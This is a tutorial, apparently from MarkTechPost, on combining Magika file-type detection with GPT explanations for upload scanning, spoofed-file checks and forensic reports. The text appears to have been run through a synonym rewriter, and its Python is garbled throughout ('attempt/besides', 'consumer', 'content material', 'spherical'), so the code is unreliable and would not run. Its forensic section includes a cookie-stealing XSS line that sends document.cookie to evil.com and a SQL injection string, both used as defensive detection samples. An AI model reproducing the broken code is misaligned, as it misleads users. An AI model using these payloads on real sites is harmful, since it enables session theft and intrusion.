|

A Coding Implementation to Build an AI-Powered File Type Detection and Security Analysis Pipeline with Magika and OpenAI

🔑

In this tutorial, we construct a workflow that mixes Magika’s deep-learning-based file kind detection with OpenAI’s language intelligence to create a sensible and insightful evaluation pipeline. We start by organising the required libraries, securely connecting to the OpenAI API, and initializing Magika to classify information instantly from uncooked bytes reasonably than counting on filenames or extensions. As we transfer via the tutorial, we discover batch scanning, confidence modes, spoofed-file detection, forensic-style evaluation, upload-pipeline danger scoring, and structured JSON reporting. At every stage, we use GPT to translate technical scan outputs into clear explanations, safety insights, and executive-level summaries, permitting us to join low-level byte detection with significant real-world interpretation.

!pip set up magika openai -q


import os, io, json, zipfile, textwrap, hashlib, tempfile, getpass
from pathlib import Path
from collections import Counter
from magika import Magika
from magika.sorts import MagikaConsequence, PredictionMode
from openai import OpenAI


print("🔑 Enter your OpenAI API key (enter is hidden):")
api_key = getpass.getpass("OpenAI API Key: ")
consumer  = OpenAI(api_key=api_key)


attempt:
   consumer.fashions.listing()
   print("✅ OpenAI linked successfullyn")
besides Exception as e:
   increase SystemExit(f"❌ OpenAI connection failed: {e}")


m = Magika()
print("✅ Magika loaded successfullyn")
print(f"   module model : {m.get_module_version()}")
print(f"   mannequin title     : {m.get_model_name()}")
print(f"   output sorts   : {len(m.get_output_content_types())} supported labelsn")


def ask_gpt(system: str, consumer: str, mannequin: str = "gpt-4o", max_tokens: int = 600) -> str:
   resp = consumer.chat.completions.create(
       mannequin=mannequin,
       max_tokens=max_tokens,
       messages=[
           {"role": "system", "content": system},
           {"role": "user",   "content": user},
       ],
   )
   return resp.decisions[0].message.content material.strip()


print("=" * 60)
print("SECTION 1 — Core API + GPT Plain-Language Explanation")
print("=" * 60)


samples = {
   "Python":     b'import osndef greet(title):n    print(f"Hello, {title}")n',
   "JavaScript": b'const fetch = require("node-fetch");nasync perform getData() { return await fetch("/api"); }',
   "CSV":        b'title,age,citynAlice,30,NYCnBob,25,LAn',
   "JSON":       b'{"title": "Alice", "scores": [10, 20, 30], "energetic": true}',
   "Shell":      b'#!/bin/bashnecho "Hello"nfor i in $(seq 1 5); do echo $i; carried out',
   "PDF magic":  b'%PDF-1.4n1 0 objn<< /Type /Catalog >>nendobjn',
   "ZIP magic":  bytes([0x50, 0x4B, 0x03, 0x04]) + bytes(26),
}


print(f"n{'Label':<12} {'MIME Type':<30} {'Score':>6}")
print("-" * 52)
magika_labels = []
for title, uncooked in samples.objects():
   res = m.identify_bytes(uncooked)
   magika_labels.append(res.output.label)
   print(f"{res.output.label:<12} {res.output.mime_type:<30} {res.rating:>5.1%}")


rationalization = ask_gpt(
   system="You are a concise ML engineer. Explain in 4–5 sentences.",
   consumer=(
       f"Magika is Google's AI file-type detector. It simply recognized these sorts from uncooked bytes: "
       f"{magika_labels}. Explain how a deep-learning mannequin detects file sorts from "
       "simply bytes, and why this beats counting on file extensions."
   ),
   max_tokens=250,
)
print(f"n💬 GPT on how Magika works:n{textwrap.fill(rationalization, 72)}n")


print("=" * 60)
print("SECTION 2 — Batch Identification + GPT Summary")
print("=" * 60)


tmp_dir = Path(tempfile.mkdtemp())
file_specs = {
   "code.py":     b"import sysnprint(sys.model)n",
   "model.css":   b"physique { font-family: Arial; margin: 0; }n",
   "information.json":   b'[{"id": 1, "val": "foo"}, {"id": 2, "val": "bar"}]',
   "script.sh":   b"#!/bin/shnecho Hello Worldn",
   "doc.html":    b"<html><physique><p>Hello</p></physique></html>",
   "config.yaml": b"server:n  host: localhostn  port: 8080n",
   "question.sql":   b"CREATE TABLE t (id INT PRIMARY KEY, title TEXT);n",
   "notes.md":    b"# Headingnn- merchandise onen- merchandise twon",
}


paths = []
for fname, content material in file_specs.objects():
   p = tmp_dir / fname
   p.write_bytes(content material)
   paths.append(p)


outcomes       = m.identify_paths(paths)
batch_summary = [
   {"file": p.name, "label": r.output.label,
    "group": r.output.group, "score": f"{r.score:.1%}"}
   for p, r in zip(paths, results)
]


print(f"n{'File':<18} {'Label':<14} {'Group':<12} {'Score':>6}")
print("-" * 54)
for row in batch_summary:
   print(f"{row['file']:<18} {row['label']:<14} {row['group']:<12} {row['score']:>6}")


gpt_summary = ask_gpt(
   system="You are a DevSecOps skilled. Be concise and sensible.",
   consumer=(
       f"A file add scanner detected these file sorts in a batch: "
       f"{json.dumps(batch_summary)}. "
       "In 3–4 sentences, summarise what sort of undertaking this appears to be like like "
       "and flag any file sorts that may warrant further scrutiny."
   ),
   max_tokens=220,
)
print(f"n💬 GPT undertaking evaluation:n{textwrap.fill(gpt_summary, 72)}n")

We set up the required libraries, join Magika and OpenAI, and arrange the core helper perform that lets us ship prompts for evaluation. We start by testing Magika on numerous uncooked byte samples to see the way it identifies file sorts with out counting on file extensions. We additionally create a batch of pattern information and use GPT to summarize what sort of undertaking or codebase the detected file assortment seems to signify.

print("=" * 60)
print("SECTION 3 — Prediction Modes + GPT Mode-Selection Guidance")
print("=" * 60)


ambiguous    = b"Hello, world. This is a brief textual content."
mode_results = {}


for mode in [PredictionMode.HIGH_CONFIDENCE,
            PredictionMode.MEDIUM_CONFIDENCE,
            PredictionMode.BEST_GUESS]:
   m_mode = Magika(prediction_mode=mode)
   res    = m_mode.identify_bytes(ambiguous)
   mode_results[mode.name] = {
       "label": res.output.label,
       "rating": f"{res.rating:.1%}",
   }
   print(f"  {mode.title:<22}  label={res.output.label:<20} rating={res.rating:.1%}")


steering = ask_gpt(
   system="You are a safety engineer. Be concise (3 bullet factors).",
   consumer=(
       f"Magika's three confidence modes returned: {json.dumps(mode_results)} "
       "for a similar ambiguous textual content snippet. Give one sensible use-case the place every mode "
       "(HIGH_CONFIDENCE, MEDIUM_CONFIDENCE, BEST_GUESS) is the fitting alternative."
   ),
   max_tokens=220,
)
print(f"n💬 GPT on when to use every mode:n{steering}n")


print("=" * 60)
print("SECTION 4 — MagikaConsequence Anatomy + GPT Field Explanation")
print("=" * 60)


code_snippet = b"""
#!/usr/bin/env python3
from typing import List


def fibonacci(n: int) -> List[int]:
   a, b = 0, 1
   outcome = []
   for _ in vary(n):
       outcome.append(a)
       a, b = b, a + b
   return outcome
"""


res = m.identify_bytes(code_snippet)
result_dict = {
   "output.label":       res.output.label,
   "output.description": res.output.description,
   "output.mime_type":   res.output.mime_type,
   "output.group":       res.output.group,
   "output.extensions":  res.output.extensions,
   "output.is_text":     res.output.is_text,
   "dl.label":           res.dl.label,
   "dl.description":     res.dl.description,
   "dl.mime_type":       res.dl.mime_type,
   "rating":              spherical(res.rating, 4),
}
for ok, v in result_dict.objects():
   print(f"  {ok:<28} = {v}")


field_explanation = ask_gpt(
   system="You are a concise ML engineer.",
   consumer=(
       f"Magika returned this outcome object for a Python file: {json.dumps(result_dict)}. "
       "In 4 sentences, clarify the distinction between the `dl.*` fields and `output.*` fields, "
       "and why dl.label and output.label would possibly differ although there is just one rating."
   ),
   max_tokens=220,
)
print(f"n💬 GPT explains dl vs output:n{textwrap.fill(field_explanation, 72)}n")


print("=" * 60)
print("SECTION 5 — Spoofed Files + GPT Threat Assessment")
print("=" * 60)


spoofed_files = {
   "bill.pdf":  b'#!/usr/bin/env python3nprint("I'm Python, not a PDF!")n',
   "photograph.jpg":    b'<html><physique>This is HTML masquerading as JPEG</physique></html>',
   "information.csv":     bytes([0x50, 0x4B, 0x03, 0x04]) + bytes(26),
   "readme.txt":   b'%PDF-1.4n1 0 objn<</Type /Catalog>>nendobjn',
   "legit.py":     b'import sysnprint(sys.argv)n',
}
ext_to_expected = {"pdf": "pdf", "jpg": "jpeg", "csv": "zip", "txt": "pdf", "py": "python"}


threats = []
print(f"n{'Filename':<18} {'Expected':^10} {'Detected':^14} {'Match':^6}  {'Score':>6}")
print("-" * 62)
for fname, content material in spoofed_files.objects():
   ext      = fname.rsplit(".", 1)[-1]
   anticipated = ext_to_expected.get(ext, ext)
   res      = m.identify_bytes(content material)
   detected = res.output.label
   match    = "✅" if detected == anticipated else "🚨"
   if detected != anticipated:
       threats.append({"file": fname, "claimed_ext": ext, "actual_type": detected})
   print(f"{fname:<18} {anticipated:^10} {detected:^14} {match:^6}  {res.rating:>5.1%}")


threat_report = ask_gpt(
   system="You are a SOC analyst. Be particular and concise.",
   consumer=(
       f"Magika detected these extension-spoofed information: {json.dumps(threats)}. "
       "For every mismatch, describe in a single sentence what the doubtless risk vector is "
       "and what motion a safety group ought to take."
   ),
   max_tokens=300,
)
print(f"n💬 GPT risk evaluation:n{threat_report}n")

We discover Magika’s prediction modes and examine how totally different confidence settings behave when the enter is ambiguous. We then examine the construction of the Magika outcome object intimately to perceive the excellence between processed output fields and uncooked mannequin fields. After that, we take a look at spoofed information with deceptive extensions and use GPT to clarify the doubtless risk vectors and advisable safety responses.

print("=" * 60)
print("SECTION 6 — Corpus Distribution + GPT Insight")
print("=" * 60)


corpus = [
   b"SELECT * FROM orders WHERE status='open';",
   b"<!DOCTYPE html><html><body>page</body></html>",
   b"import numpy as npnprint(np.zeros(10))",
   b"body { color: red; }",
   b'{"key": "value"}',
   b"name,scorenAlice,95nBob,87",
   b"# Titlen## Sectionn- bullet",
   b"echo hellonls -la",
   b"const x = () => 42;",
   b"package mainnimport "fmt"nfunc main() { fmt.Println("Go") }",
   b"public class Hello { public static void main(String[] a) {} }",
   b"fn fundamental() { println!("Rust!"); }",
   b"#!/usr/bin/env rubynputs 'hi there'",
   b"<?php echo 'Hello World'; ?>",
   b"[section]nkey=valuenanother=factor",
   b"FROM python:3.11nCOPY . /appnCMD python app.py",
   b"apiVersion: v1nkind: Podnmetadata:n  title: take a look at",
]


all_results  = [m.identify_bytes(b) for b in corpus]
group_counts = Counter(r.output.group for r in all_results)
label_counts = Counter(r.output.label for r in all_results)


print("nBy GROUP:")
for grp, cnt in sorted(group_counts.objects(), key=lambda x: -x[1]):
   print(f"  {grp:<12} {'█' * cnt} ({cnt})")


print("nBy LABEL:")
for lbl, cnt in sorted(label_counts.objects(), key=lambda x: -x[1]):
   print(f"  {lbl:<18} {cnt}")


distribution = {"teams": dict(group_counts), "labels": dict(label_counts)}
perception = ask_gpt(
   system="You are a employees engineer reviewing a code repository. Be concise.",
   consumer=(
       f"A file scanner discovered this kind distribution: {json.dumps(distribution)}. "
       "In 3–4 sentences, describe what sort of repository that is, "
       "and recommend one factor to be careful for from a maintainability perspective."
   ),
   max_tokens=220,
)
print(f"n💬 GPT repository perception:n{textwrap.fill(perception, 72)}n")


print("=" * 60)
print("SECTION 7 — Minimum Bytes Needed + GPT Explanation")
print("=" * 60)


full_python = b"#!/usr/bin/env python3nimport os, sysnprint('hi there')n" * 10
probe_data  = {}
print(f"nFull content material measurement: {len(full_python)} bytes")
print(f"n{'Prefix (bytes)':<18} {'Label':<14} {'Score':>6}")
print("-" * 40)
for measurement in [4, 8, 16, 32, 64, 128, 256, 512]:
   res = m.identify_bytes(full_python[:size])
   probe_data[str(size)] = {"label": res.output.label, "rating": spherical(res.rating, 3)}
   print(f"  first {measurement:<10}  {res.output.label:<14} {res.rating:>5.1%}")


probe_insight = ask_gpt(
   system="You are a concise ML engineer.",
   consumer=(
       f"Magika's identification of a Python file at totally different byte-prefix lengths: "
       f"{json.dumps(probe_data)}. "
       "In 3 sentences, clarify why a mannequin can establish file sorts from so few bytes, "
       "and what architectural decisions make this doable."
   ),
   max_tokens=200,
)
print(f"n💬 GPT on byte-level detection:n{textwrap.fill(probe_insight, 72)}n")

We analyze a combined corpus of code and configuration content material to perceive the distribution of detected file teams and labels throughout a repository-like dataset. We use these outcomes to let GPT infer the repository’s nature and spotlight maintainability issues based mostly on the detected composition. We additionally probe what number of bytes Magika wants for identification and look at how early byte-level patterns can nonetheless reveal file identification with helpful confidence.

print("=" * 60)
print("SECTION 8 — Upload Scanner Pipeline + GPT Risk Scoring")
print("=" * 60)


upload_dir = Path(tempfile.mkdtemp()) / "uploads"
upload_dir.mkdir()
uploads = {
   "report.pdf":      b'%PDF-1.4n1 0 objn<</Type /Catalog>>nendobjn',
   "data_export.csv": b"id,title,emailn1,Alice,[email protected],Bob,[email protected]",
   "setup.sh":        b"#!/bin/bashnapt-get replace && apt-get set up -y curln",
   "config.json":     b'{"debug": true, "staff": 4}',
   "malware.exe":     bytes([0x4D, 0x5A]) + bytes(100),
   "index.html":      b"<html><physique>Hello</physique></html>",
   "fundamental.py":         b"from flask import Flasknapp = Flask(__name__)n",
   "suspicious.txt":  bytes([0x4D, 0x5A]) + bytes(50),
}


for fname, content material in uploads.objects():
   (upload_dir / fname).write_bytes(content material)


all_paths     = listing(upload_dir.iterdir())
batch_results = m.identify_paths(all_paths)


BLOCKED_LABELS = {"pe", "elf", "macho"}
ext_map        = {"pdf": "pdf", "csv": "csv", "sh": "shell", "json": "json",
                 "exe": "pe", "html": "html", "py": "python", "txt": "txt"}


scan_results = []
print(f"n{'File':<22} {'Label':<16} {'Score':>6}  {'Status'}")
print("-" * 65)
for path, res in zip(all_paths, batch_results):
   o        = res.output
   ext      = path.suffix.lstrip(".")
   anticipated = ext_map.get(ext, "")
   mismatch = anticipated and (o.label != anticipated)


   if o.label in BLOCKED_LABELS:
       standing = "🚫 BLOCKED"
   elif mismatch:
       standing = f"⚠  MISMATCH (ext:{anticipated})"
   else:
       standing = "✅ OK"


   scan_results.append({
       "file":   path.title,
       "label":  o.label,
       "group":  o.group,
       "rating":  spherical(res.rating, 3),
       "standing": standing.substitute("🚫 ", "").substitute("⚠  ", "").substitute("✅ ", ""),
   })
   print(f"{path.title:<22} {o.label:<16} {res.rating:>5.1%}  {standing}")


risk_report = ask_gpt(
   system="You are a senior safety analyst. Be structured and actionable.",
   consumer=(
       f"A file add scanner produced these outcomes: {json.dumps(scan_results)}. "
       "Provide a 5-sentence danger abstract: establish the highest-risk information, "
       "clarify why they're dangerous, and give concrete remediation steps."
   ),
   max_tokens=350,
)
print(f"n💬 GPT danger report:n{risk_report}n")


print("=" * 60)
print("SECTION 9 — Forensics + GPT IOC Narrative")
print("=" * 60)


forensic_samples = [
   ("sample_A", b"import renpattern = re.compile(r'd+')n"),
   ("sample_B", b'{"attack": "sqli", "payload": "1 OR 1=1"}'),
   ("sample_C", bytes([0xFF, 0xD8, 0xFF, 0xE0]) + b"JFIF" + bytes(50)),
   ("sample_D", b"<script>doc.location='http://evil.com?c='+doc.cookie</script>"),
   ("sample_E", b"MZ" + bytes(100)),
]


ioc_data = []
print(f"n{'Name':<12} {'SHA256':18} {'Label':<14} {'MIME':<28} {'is_text'}")
print("-" * 80)
for title, content material in forensic_samples:
   sha = hashlib.sha256(content material).hexdigest()[:16]
   res = m.identify_bytes(content material)
   o   = res.output
   ioc_data.append({
       "id":            title,
       "sha256_prefix": sha,
       "label":         o.label,
       "mime":          o.mime_type,
       "is_text":       o.is_text,
   })
   print(f"{title:<12} {sha:<18} {o.label:<14} {o.mime_type:<28} {o.is_text}")


ioc_narrative = ask_gpt(
   system="You are a risk intelligence analyst writing an incident report.",
   consumer=(
       f"During a forensic investigation, these file samples have been recovered: "
       f"{json.dumps(ioc_data)}. "
       "Write a concise 5-sentence Indicators of Compromise (IOC) narrative "
       "describing the doubtless assault chain and what every pattern represents."
   ),
   max_tokens=350,
)
print(f"n💬 GPT IOC narrative:n{ioc_narrative}n")

We simulate an actual upload-scanning pipeline that classifies information, compares detected sorts in opposition to anticipated extensions, and decides whether or not every file must be allowed, flagged, or blocked. We then transfer right into a forensic state of affairs during which we generate SHA-256 prefixes, examine MIME sorts, and create structured indicators from recovered file samples. Throughout each elements, we use GPT to convert technical scan outcomes into sensible danger summaries and concise IOC-style incident narratives.

print("=" * 60)
print("SECTION 10 — JSON Report + GPT Executive Summary")
print("=" * 60)


export_samples = {
   "api.py":      b"from fastapi import FastAPInapp = FastAPI()[email protected]('/')ndef root(): return {}n",
   "schema.sql":  b"CREATE TABLE customers (id SERIAL PRIMARY KEY, e-mail TEXT UNIQUE);n",
   "deploy.yaml": b"title: deploynon: pushnjobs:n  construct:n    runs-on: ubuntu-latestn",
   "evil.exe":    bytes([0x4D, 0x5A]) + bytes(100),
   "spoof.pdf":   b'#!/usr/bin/env python3nprint("not a pdf")n',
}


report = []
for title, content material in export_samples.objects():
   res = m.identify_bytes(content material)
   o   = res.output
   report.append({
       "filename":    title,
       "label":       o.label,
       "description": o.description,
       "mime_type":   o.mime_type,
       "group":       o.group,
       "is_text":     o.is_text,
       "dl_label":    res.dl.label,
       "rating":       spherical(res.rating, 4),
   })


print(json.dumps(report, indent=2))


exec_summary = ask_gpt(
   system="You are a CISO writing a two-paragraph govt abstract. Be clear and non-technical.",
   consumer=(
       f"An AI file scanner analysed these information: {json.dumps(report)}. "
       "Write a two-paragraph govt abstract: paragraph 1 covers what was discovered "
       "and the general danger posture; paragraph 2 provides advisable subsequent steps."
   ),
   max_tokens=400,
)
print(f"n💬 GPT govt abstract:n{exec_summary}n")


out_path = "/tmp/magika_openai_report.json"
with open(out_path, "w") as f:
   json.dump({"scan_results": report, "executive_summary": exec_summary}, f, indent=2)
print(f"💾 Full report saved to: {out_path}")


print("n" + "=" * 60)
print("✅ Magika + OpenAI Tutorial Complete!")
print("=" * 60)
print("""
All fixes utilized (magika 1.0.2):
 ✗ from magika import MagikaConfig    → eliminated (by no means existed)
 ✗ MagikaConfig(prediction_mode=m)   → Magika(prediction_mode=m)
 ✗ m.get_model_version()             → m.get_model_name()
 ✗ res.output_score                  → res.rating
 ✗ res.dl_score / res.dl.rating       → res.rating  (rating solely lives on MagikaConsequence)


MagikaConsequence subject map (1.0.2):
 res.rating           ← the one and solely confidence rating
 res.output.label    ← last label after threshold logic   (use this)
 res.dl.label        ← uncooked mannequin label earlier than thresholding (for debugging)
 res.output.*        ← description, mime_type, group, extensions, is_text
 res.dl.*            ← similar fields however from the uncooked mannequin output


Sections:
 §1   Core API (bytes/path/stream)         + GPT explains Magika's ML strategy
 §2   Batch scanning                       + GPT project-type evaluation
 §3   Confidence modes through constructor arg + GPT when-to-use steering
 §4   MagikaConsequence anatomy                 + GPT explains dl vs output fields
 §5   Spoofed-file detection               + GPT risk evaluation per mismatch
 §6   Corpus distribution                  + GPT repository perception
 §7   Byte-prefix probing                  + GPT explains byte-level detection
 §8   Upload pipeline (enable/block/flag)   + GPT danger report
 §9   Forensics hash+kind fingerprinting   + GPT IOC narrative
§10   JSON report export                   + GPT CISO govt abstract
""")

We construct a structured JSON report from a number of analyzed information and seize key metadata, together with labels, MIME sorts, textual content standing, and mannequin confidence scores. We then use GPT to produce a non-technical govt abstract that explains the general findings, danger posture, and advisable subsequent steps in a approach that management can perceive. Finally, we export the outcomes to a JSON file and print a completion abstract that reinforces the Magika 1.0.2 fixes and the complete scope of the tutorial.

In conclusion, we noticed how Magika and OpenAI work collectively to type a robust AI-assisted file evaluation system that’s each technically strong and simple to perceive. We use Magika to establish true file sorts, detect mismatches, examine suspicious content material, and analyze repositories or uploads at scale. At the identical time, GPT helps us clarify outcomes, assess dangers, and generate concise narratives for various audiences. This mixture gives a workflow that’s helpful for builders and researchers, and additionally for safety groups, forensic analysts, and technical decision-makers who want quick, correct perception from file information. Overall, we create a sensible end-to-end pipeline that reveals how fashionable AI can enhance file inspection, safety triage, and automated reporting in a extremely accessible Colab atmosphere.


Check out the Full Codes with Notebook here. Also, be at liberty to comply with us on Twitter and don’t neglect to be a part of our 130k+ ML SubReddit and Subscribe to our Newsletter. Wait! are you on telegram? now you can join us on telegram as well.

Need to accomplice with us for selling your GitHub Repo OR Hugging Face Page OR Product Release OR Webinar and many others.? Connect with us

The publish A Coding Implementation to Build an AI-Powered File Type Detection and Security Analysis Pipeline with Magika and OpenAI appeared first on MarkTechPost.

Similar Posts